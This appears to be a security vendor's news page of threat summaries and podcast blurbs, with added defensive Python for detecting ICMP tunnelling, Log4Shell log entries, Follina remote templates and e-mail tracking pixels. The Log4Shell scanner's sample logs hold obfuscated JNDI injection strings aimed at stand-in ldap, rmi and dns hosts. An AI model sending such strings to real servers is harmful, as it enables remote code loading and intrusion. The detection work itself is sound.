Breaking industry news, cyber security resources, trends and more.
Gallium APT Group
Researchers from Palo Alto Networks describe the PingPull RAT as a "difficult-to-detect" backdoor that uses the Internet Control Message Protocol (ICMP) for C2 communications. They also found PingPull variants that use HTTPS or raw TCP for C2 instead of ICMP. The cyberespionage group has started targeting financial institutions and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia and Vietnam, and unlike in past attacks it is now deploying PingPull.
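ICMP tunnelling is hard to spot because echo requests are everywhere, but ordinary ping traffic has a very regular shape: one payload size per flow, a fixed filler pattern, and low entropy. The heuristic below, added here as an illustration and not taken from the Unit 42 report, groups echo requests by source/destination pair and flags flows that break that shape. The packet records and the "stock ping" filler patterns are constructed sample data and an assumption about common ping tools; production detection would read decoded ICMP from a sensor rather than a list of dicts.

```python
import hashlib
import math
import struct
from collections import Counter, defaultdict

ECHO_REQUEST = 8  # ICMP type for echo request


def shannon_entropy(data):
    """Bits of entropy per byte of `data` (0.0 for empty input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


# Filler that Windows ping sends in every echo request.
WINDOWS_PATTERN = b"abcdefghijklmnopqrstuvwabcdefghi"


def looks_like_stock_ping(payload):
    """True for the fixed filler common ping tools send: the Windows alphabet
    pattern, or (iputils style) an 8-byte timestamp followed by a run of
    consecutive byte values. Assumption: other ping implementations may differ."""
    if payload == WINDOWS_PATTERN:
        return True
    body = payload[8:]
    if len(body) < 8:
        return False
    return all(((body[i] + 1) & 0xFF) == body[i + 1] for i in range(len(body) - 1))


def suspicious_icmp_flows(packets, entropy_threshold=6.0):
    """Group echo requests by (src, dst) and report flows whose payloads do not
    behave like ping: sizes change between packets, the filler is not a known
    pattern, or the bytes look encrypted (entropy approaching 8 bits/byte)."""
    flows = defaultdict(list)
    for pkt in packets:
        if pkt["type"] == ECHO_REQUEST:
            flows[(pkt["src"], pkt["dst"])].append(pkt["payload"])
    findings = {}
    for key, payloads in flows.items():
        reasons = []
        if len({len(p) for p in payloads}) > 1:
            reasons.append("variable payload size")
        if not all(looks_like_stock_ping(p) for p in payloads):
            reasons.append("payload differs from stock ping filler")
        if max(shannon_entropy(p) for p in payloads) >= entropy_threshold:
            reasons.append("high-entropy payload")
        if reasons:
            findings[key] = reasons
    return findings


# Constructed sample traffic (not a real capture): two hosts running ordinary
# ping, and one host whose echo requests carry pseudo-random "encrypted" data.
def _linux_ping_payload():
    timestamp = struct.pack("!II", 1_655_000_000, 123_456)
    return timestamp + bytes(range(8, 56))  # 56-byte default payload


def _c2_payload(seq):
    # Chained SHA-256 digests stand in for an encrypted C2 message of varying length.
    blocks = 8 + seq % 4
    return b"".join(hashlib.sha256(b"c2-%d-%d" % (seq, i)).digest() for i in range(blocks))


SAMPLE_PACKETS = (
    [{"src": "10.0.0.2", "dst": "10.0.0.1", "type": 8, "payload": _linux_ping_payload()} for _ in range(5)]
    + [{"src": "10.0.0.3", "dst": "10.0.0.1", "type": 8, "payload": WINDOWS_PATTERN} for _ in range(4)]
    + [{"src": "10.0.0.7", "dst": "203.0.113.5", "type": 8, "payload": _c2_payload(i)} for i in range(6)]
)

if __name__ == "__main__":
    for (src, dst), reasons in suspicious_icmp_flows(SAMPLE_PACKETS).items():
        print(f"{src} -> {dst}: {', '.join(reasons)}")
```

The entropy threshold is deliberately above log2(56), the maximum a 56-byte all-distinct ping payload can reach, so stock Linux pings are not flagged on entropy alone; a flow has to fail the size or filler check as well, which is exactly what a tunnelled channel does.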
US-CERT Alert: Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems
The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.
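Hunting for Log4Shell attempts in web and UAG access logs is complicated by the obfuscation attackers wrap around the `${jndi:...}` lookup (nested `${lower:}`/`${upper:}` lookups, `${::-x}` default-value tricks, URL encoding). The scanner below, added here as an example and not part of the CISA/CGCYBER advisory, normalizes each line the way Log4j's lookup evaluator would before matching. The log lines, hosts and paths are constructed sample data.

```python
import re
import urllib.parse

# Constructed sample log lines in a common access-log layout; hosts and
# paths are made up. The last field is the User-Agent header, a frequent
# carrier of Log4Shell payloads.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET /portal/info.jsp HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET /portal/info.jsp HTTP/1.1" 200 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - "GET /portal/info.jsp HTTP/1.1" 200 "-" "${${lower:j}${lower:n}di:${lower:l}dap://203.0.113.10/b}"',
    '10.0.0.9 - - "GET /portal/info.jsp HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/c}"',
    '10.0.0.9 - - "GET /portal/info.jsp?q=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%7D HTTP/1.1" 404 "-" "curl/7.79"',
    '10.0.0.3 - - "GET /portal/info.jsp HTTP/1.1" 200 "-" "${date:yyyy}"',
]

# Innermost lookup: a ${...} whose body contains no further lookup.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_obfuscation(match):
    """Collapse the lookups attackers use to hide the word 'jndi':
    ${lower:x} / ${upper:x} and the default-value form ${name:-x}
    (which covers ${::-x}). Anything else is left untouched."""
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    prefix, sep, arg = body.partition(":")
    if sep and prefix.strip().lower() in ("lower", "upper"):
        return arg.lower() if prefix.strip().lower() == "lower" else arg.upper()
    return match.group(0)


def normalize(text, max_rounds=20):
    """Undo (possibly layered) URL encoding, then evaluate obfuscating
    lookups from the inside out until the text stops changing."""
    for _ in range(3):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):
        rewritten = INNER_LOOKUP.sub(_resolve_obfuscation, text)
        if rewritten == text:
            break
        text = rewritten
    return text


def scan(lines):
    """Return (line_number, jndi_protocol) for each line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        normalized = normalize(line)
        match = JNDI_LOOKUP.search(normalized)
        if match:
            protocol = normalized[match.end():].split(":", 1)[0].strip().lower()
            hits.append((number, protocol))
    return hits


if __name__ == "__main__":
    for number, protocol in scan(SAMPLE_LOGS):
        print(f"line {number}: JNDI lookup via {protocol}")
```

A plain `grep jndi` misses lines 3 and 4 of the sample; normalizing first catches them, and the protocol field (ldap, rmi, dns) tells the responder whether to expect a class load or just a DNS callback.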
PureCrypter: A Fully-Functional Loader Distributing Remote Access Trojans and Information Stealers
PureCrypter is a fully-featured loader that is being widely sold. It has been observed distributing a variety of remote access trojans and information stealers. The loader is a .NET executable obfuscated with SmartAssembly that uses compression, encryption and obfuscation to evade antivirus products. Its persistence, injection and defense-evasion features are configurable through a message in Google's Protocol Buffers format.
CERT-IL Alert: An Active Phishing Campaign in Israel Leads to Malware
Recently, new information passed to the CERT-IL team indicated an active phishing campaign against users in Israel. The campaign starts with a malicious email purporting to come from "Israel Post" and carrying a malicious attachment that leads to malware being installed on the recipient's computer.
Google-sudoers Privilege Escalation
In this series of articles, we will discuss a variety of MITRE ATT&CK techniques for Google Cloud Platform (GCP). The articles will cover techniques such as persistence, privilege escalation, lateral movement, and more. The first technique we will discuss is privilege escalation in GCP through a process called "google-guest-agent".

Google Compute Engine Services
Google Compute Engine (GCE) has several services that are run by the systemd daemon, including "google-guest-agent.service". This service is responsible for executing the binary "google-guest-agent" at boot. The agent is a child of the init process and runs as root.

What is google-guest-agent?
"google-guest-agent" is a daemon responsible for handling GCE platform features. The guest agent's functionality can be separated into various areas of responsibility. Historically, on Linux these were managed by separate independent processes, but today they are all managed by the guest agent. The guest agent handl
Msiexec Impersonation - Exploit Leads to Data Exfiltration
In this multi-day intrusion, The DFIR Report observed a threat actor gain initial access to an organization by exploiting a vulnerability in ManageEngine SupportCenter Plus. The threat actor discovered files on the server and dumped credentials using a web shell, moved laterally to key servers using Plink and RDP, and exfiltrated sensitive information using the web shell and RDP. The FBI and CISA had published an advisory noting that APT attackers were using CVE-2021-44077 to gain initial access to the networks of organizations in critical infrastructure sectors such as healthcare, financial services, electronics and IT consulting.
Confluence Pre-Auth RCE
On June 02, 2022, Atlassian released a security advisory for its Confluence Server and Data Center applications, highlighting a critical-severity unauthenticated remote code execution vulnerability. The OGNL injection flaw allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance and is currently being exploited by a specific threat actor. To bring value to our customers and help them test and verify that their systems are secure against it, our research team rushed to release a purple team module for that specific purpose. You can find it under the following name: Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134). The execution expects two input arguments:
Hostname: the vulnerable host to check.
Command: the command to run if the host is found to be vulnerable (defaults to whoami, which prints the name of the user the service runs as).
3 Quick Wins for Risk Mitigation on Each Attack Vector
It is crucial to protect yourself from cyber-attacks that can compromise your security posture and cause damage to your organization. With proper configurations and implementations, you can help prevent these attacks from impacting your organization. For each attack vector, we have compiled the top 3 recommendations for risk mitigation.

Email Gateway
Block unnecessary attachment file types: allow only the minimum required for operating your organization.
Enable aggressive anti-malware scanning such as advanced AV, sandboxing, or CDR.
Enable URL scanning, sandboxing, and rewriting in both the email body and attachments.

Web Gateway
Block downloads, or allow only the minimum list of file types required for operating your organization.
Block browsing categories that are not required for operating your organization. Focus on questionable categories such as "Newly Registered Domains," "Parked Domains," and "Uncategorized."
Implement browsing isolation to ensure th
Follina - A Microsoft Office Code Execution Zero Day, Now Exploited in the Wild
Nao_sec identified an odd-looking Word document in the wild, uploaded from an IP address in Belarus. It turned out to exploit a zero-day vulnerability in Office and/or Windows, and Defender for Endpoint missed the execution. The document uses the Word remote template feature to retrieve an HTML file from a remote web server, which in turn uses the ms-msdt MSProtocol URI scheme to load some code and execute PowerShell.
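Because the malicious behaviour starts with the remote-template relationship inside the .docx package, a triage check does not need to run Word at all: unzip the document and look for relationships marked External. The helper below is an added example, not code from nao_sec or the analysis above; it builds a minimal .docx in memory from constructed sample data, lists every external relationship, and separately checks fetched HTML for the ms-msdt: scheme. The template URL and file layout are assumptions for illustration, not the real maldoc.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def build_sample_docx(template_target=None):
    """Construct a minimal .docx in memory (sample data, not the real maldoc).
    If `template_target` is given, the document is wired to an attached template
    through word/_rels/settings.xml.rels, the mechanism the remote-template
    feature relies on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("word/document.xml", f"<w:document xmlns:w='{W_NS}'><w:body/></w:document>")
        if template_target:
            z.writestr("word/settings.xml",
                       f"<w:settings xmlns:w='{W_NS}' xmlns:r='{R_NS}'>"
                       "<w:attachedTemplate r:id='rId1'/></w:settings>")
            z.writestr("word/_rels/settings.xml.rels",
                       f"<Relationships xmlns='{REL_NS}'>"
                       f"<Relationship Id='rId1' Type='{ATTACHED_TEMPLATE}' "
                       f"Target='{template_target}' TargetMode='External'/></Relationships>")
    return buf.getvalue()


def external_relationships(docx_bytes):
    """List (rels_part, relationship_type, target) for every relationship the
    package marks TargetMode="External", i.e. anything Word may fetch from
    outside the file."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    rel_type = (rel.get("Type") or "").rsplit("/", 1)[-1]
                    found.append((name, rel_type, rel.get("Target")))
    return found


def pulls_remote_template(docx_bytes):
    """True when the attached template lives on an http(s) server rather than
    a local path: Word will fetch it when the document is opened."""
    for _, rel_type, target in external_relationships(docx_bytes):
        if rel_type == "attachedTemplate" and re.match(r"https?://", target or "", re.IGNORECASE):
            return True
    return False


# The fetched template is an HTML file; this URI scheme is what hands
# control to the Microsoft Support Diagnostic Tool.
MSDT_SCHEME = re.compile(r"ms-msdt:", re.IGNORECASE)


def html_invokes_msdt(html_text):
    """True if the HTML references the ms-msdt: protocol handler."""
    return bool(MSDT_SCHEME.search(html_text))


if __name__ == "__main__":
    suspect = build_sample_docx("http://template.example/stage2.html")
    print(external_relationships(suspect))
    print("remote template:", pulls_remote_template(suspect))
```

Legitimate documents attach templates too, but from local or file-share paths; an http(s) target is the signal worth alerting on, and the rels part tells you where to pull the second stage from for analysis.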
QR Codes on Twitter Deliver Malicious Chrome Extension
ISO file downloads are advertised via QR codes on Twitter and on supposedly free gaming sites, but they don't contain what they promise. The loader for the malicious Chrome extension was initially analysed by @x3ph1, who dubbed it ChromeLoader. To avoid confusion with legitimate Chrome components we refer to it here as Choziosi loader. That analysis of the loader is detailed, but x3ph1 does not describe the Chrome extension itself. Twitter user @th3_protoCOL found QR codes circulating on Twitter that advertise pirated software to lure people into downloading an ISO. Reddit users also complain about malicious ISO files on websites that provide Steam games, and @StopMalvertisin reports that the ISOs are delivered via malicious advertisements.
New Chaos Ransomware Builder Variant "Yashma" Discovered in the Wild
Cybersecurity researchers have disclosed details of the latest version of the Chaos ransomware line, dubbed Yashma. While Chaos was purportedly a .NET version of Ryuk, closer examination of the sample reveals that it doesn't share much with the notorious ransomware. In fact, early versions of Chaos, which is now in its fourth iteration, were more akin to a destructive trojan than to traditional ransomware. The Yashma version adds some new capabilities.
Twisted Panda: Chinese APT Espionage Operation Against Russia
Check Point Research (CPR) details a targeted campaign that has been using sanctions-related baits to attack Russian defense institutes that are part of the Rostec Corporation. The investigation shows that this campaign is part of a larger Chinese espionage operation that has been ongoing against Russian-related entities for several months. CPR researchers estimate with high confidence that the campaign has been carried out by an experienced and sophisticated Chinese nation-state APT.
Malicious Compiled HTML Help File Delivering Agent Tesla
Palo Alto Networks Unit 42 discovered a malicious compiled HTML help (.chm) file delivering Agent Tesla. The attack is interesting because attackers are always looking for creative ways to deliver their payloads, with a twofold purpose: to bypass security products, and to bypass security awareness training. Potential victims may have been trained to avoid documents, scripts and executables from unknown senders, but almost any file type can carry a payload. Agent Tesla is well-known malware that has been around for a while. It focuses on stealing sensitive information from a victim's computer and sending it to the attacker over FTP, SMTP or HTTP, primarily via keystroke logging, screen capturing, camera recording and harvesting stored credentials and other sensitive data.
Researchers Warn of Nerbian RAT Targeting Entities in Italy, Spain, and the U.K.
A previously undocumented remote access trojan (RAT) written in the Go programming language has been spotted disproportionately targeting entities in Italy, Spain, and the U.K. Called Nerbian RAT by enterprise security firm Proofpoint, the novel malware leverages COVID-19-themed lures to propagate as part of a low-volume email-borne phishing campaign.
The Lotus Panda Is Awake, Again
In this attack analyzed by C25, the Chinese APT used a spear-phishing email to deliver a beacon of a red team framework known as "Viper". The kill chain includes an artifact that is already known, was attributed to Naikon a year ago, and is used to load and execute a custom shellcode. The target of this attack is currently unknown, but given the group's previous history it is very likely a government institution in a South Asian country.
Leverage Cymulate Exposure Management and Security Control Validation to Support All MITRE 11 Strategies for a World-Class SOC
MITRE just published the 11 Strategies of a World-Class Cybersecurity Operations Center book. A recurring theme in this book is the importance of Cyber Threat Intelligence (CTI) as instrumental to "augment the SOC's ability to identify adversaries and discern their movements from those of authorized users." The document further states that CTI "moves the SOC from a per-incident approach to an adversary-focused paradigm." Cymulate Exposure Management and Security Control Validation is designed to provide extensive in-context CTI capabilities and, as such, supports each of these strategies, as briefly outlined below.

MITRE Strategy 1 - Know what you are protecting and why:
Exposure Management and Security Control Validation provides continuously updated situational awareness of the security posture of individual attack vectors, including iteratively observing, orienting, deciding, and acting through: the creation and continuous update of a composite inventory of all exposed assets
🎙 Executive Understanding of Cyber Risk and Risk Reduction with Magda Chelly
As a business executive, understanding how cyber risks can lead to financial losses and, more importantly, how to reduce risk to an acceptable level is critical. Today we are going to discuss: how cybersecurity risk is real business risk; how everyone is a target; how business-driven risk reduction is key to the success of cybersecurity programs; what questions an executive should ask, what to measure and how to mitigate these risks; and a non-technical understanding of how Extended Security Posture Management with offensive testing is used to visualize, explain and reduce risk, and to ensure optimized value for your cybersecurity spend. Dr. Magda Chelly is an award-winning global cybersecurity leader. IFSEC Global has listed her as one of the top 20 most influential cybersecurity personalities globally. After years of experience as Information Security Officer in several multinational organizations, she co-founded a cybersecurity start-up.
🎙 Essential Application & Web Cybersecurity with Tanya Janca
Never have applications, most of them web based, been more critical to the success of every business. Yet when looking at enterprises' ability to shore up security here, it has become the weakest link. In Verizon's 2021 Data Breach Investigations Report, web applications accounted for 89% of credential abuse and over 56% of asset compromises.
🎙 Demystifying Zero Trust with Chuck Brooks
Zero Trust has become the framework of choice to reduce risk and ensure optimized cybersecurity. Join Dave Klein, Director and Cyber Evangelist for Cymulate, and his guest Chuck Brooks as they discuss it. Join this talk to learn: how to make Zero Trust truly actionable and continuous; how to optimize risk reduction and outcomes; and the role of offensive testing and purple teaming in Zero Trust.
🎙 Essential Purple Teaming Management
Wednesday, February 9th, 2022. Guest: Tracy Z. Maleeff. Target audience: Leadership and Technical. To mitigate and reduce cybersecurity risks, it is essential that everyone within an enterprise becomes involved. Purple teaming has become the natural evolution of goal-oriented cybersecurity risk management. Join our podcast to learn: the problems with legacy methods; the benefits of purple teaming and offensive testing; how to explain its importance to management in terms they understand; and how to maximize success and the inclusion of other teams.
Leveraging the Pyramid of Pain and the Diamond Model to do great Threat Hunting Simulations
One of Cymulate's greatest features is the Purple Team module. It allows users to create advanced attack scenarios for threat hunting using templates, which chain together the many executions created by Cymulate. Bundled with the Immediate Threats module, one can create strong threat hunting scenarios. But how does one create good threat hunting scenarios that really challenge one's Blue Team and test their capabilities?

The Pyramid of Pain
Let's look at the Pyramid of Pain, from a great article written back in 2014. It was designed in 2013 as a response to the APT1 report written by Mandiant and to the discussion around it: people were talking mostly about detecting the host-based and network-based indicators instead of leveraging the information describing the TTPs reported within the report. In short:
Hash values: the computed hash values of malware and tools dropped in a compromise; these can be added into
🚨 Iranian Hackers Targeting Turkey and Arabian Peninsula in New Malware Campaign 🚨
The Iranian state-sponsored threat actor known as MuddyWater has been attributed to a new swarm of attacks targeting Turkey and the Arabian Peninsula with the goal of deploying remote access trojans (RATs) on compromised systems. "The MuddyWater supergroup is highly motivated and can use unauthorized access to conduct espionage, intellectual property theft, and deploy ransomware and destructive malware in an enterprise," Cisco Talos researchers Asheer Malhotra, Vitor Ventura, and Arnaud Zobec said in a report. The group, which has been active since at least 2017, is known for its attacks on various sectors that help further advance Iran's geopolitical and national security objectives.
This Week's Newscast: Cyberthreat - Current Conflict in Ukraine
In this newscast we go in depth on the cyber threat the current conflict poses to Ukraine 🇺🇦 and to the rest of the world. Watch this newscast to learn: the history of cyberattacks against Ukraine; the DDoS and wiper cyber weapons in use in today's conflict; what global sanctions are in effect against Russia; examples of Russia using its cyber weapons outside Ukraine; the potential Russian targets globally; and what additional offensive cyber options are open to the US and its allies.
🚨 TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates 🚨
Proofpoint researchers have observed TA416, an actor assessed to be aligned with the Chinese state, utilizing web bugs to profile their targets. Commonly referred to as tracking pixels, web bugs embed a hyperlinked non-visible object within the body of an email that, when enabled, will attempt to retrieve a benign image file from an actor-controlled server. This provides a "sign of life" to threat actors and indicates that the targeted account is valid and that the user is inclined to open emails that utilize social engineering content. TA416 has been using web bugs to target victims prior to delivering malicious URLs that install a variety of PlugX malware payloads. The operational tempo of these campaigns, specifically those against European governments, has increased sharply since Russian troops began amassing on the border of Ukraine. The use of the web bug reconnaissance technique suggests TA416 is being more discerning about which targets the group chooses to deliver malwa
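The reconnaissance step described above can be caught at the mail gateway or in a phishing-triage pipeline by looking for exactly the profile Proofpoint describes: a remote image that is invisible to the reader. The parser below is an added example, not Proofpoint's code or a TA416 sample; it walks the `<img>` tags of an HTML body and flags those fetched from an untrusted host that are 1x1 or smaller or hidden by inline CSS, while skipping inline (cid:) attachments that never hit the network. The e-mail body, hosts and URLs are constructed sample data.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed HTML body of a lure e-mail (not a TA416 sample). The inline
# logo and the corporate banner are benign; the last two images are beacons.
SAMPLE_EMAIL_HTML = """
<html><body>
<p>Dear colleague, please find the updated agenda attached.</p>
<img src="cid:logo@corp.example" width="120" height="40" alt="logo">
<img src="https://www.corp.example/images/banner.png" width="600" height="100">
<img src="https://cdn.tracker.example/open/7f3a9c1e2b.gif" width="1" height="1">
<img src="http://198.51.100.23/t.png" style="display: none; width: 0px">
</body></html>
"""


class _ImgCollector(HTMLParser):
    """Collect the attributes of every <img> tag in the document."""

    def __init__(self):
        super().__init__()
        self.images = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "img":
            self.images.append({k.lower(): (v or "") for k, v in attrs})


def _pixels(value):
    """Parse a width/height attribute such as '1' or '1px'; None if absent or unparseable."""
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None


def find_web_bugs(html_text, trusted_hosts=()):
    """Return the remote images that fit the web-bug profile: fetched from a
    server outside `trusted_hosts` and either at most 1x1 pixel or hidden by
    inline CSS. Inline (cid:) attachments never trigger a network fetch and
    are skipped."""
    parser = _ImgCollector()
    parser.feed(html_text)
    bugs = []
    for img in parser.images:
        src = img.get("src", "")
        host = urlparse(src).hostname
        if not host or host in trusted_hosts:
            continue
        width, height = _pixels(img.get("width")), _pixels(img.get("height"))
        style = img.get("style", "").replace(" ", "").lower()
        reasons = []
        if (width is not None and width <= 1) or (height is not None and height <= 1):
            reasons.append("tiny")
        if "display:none" in style or "visibility:hidden" in style or re.search(r"(width|height):0(px)?", style):
            reasons.append("hidden")
        if reasons:
            bugs.append({"src": src, "host": host, "reasons": reasons})
    return bugs


if __name__ == "__main__":
    for bug in find_web_bugs(SAMPLE_EMAIL_HTML, trusted_hosts={"www.corp.example"}):
        print(f"{bug['host']}: {', '.join(bug['reasons'])}  <- {bug['src']}")
```

The hosts this surfaces are the actor-controlled servers worth blocking before the follow-on malicious URL arrives; the per-recipient token in the image path is what turns a fetch into a "sign of life" for one specific mailbox.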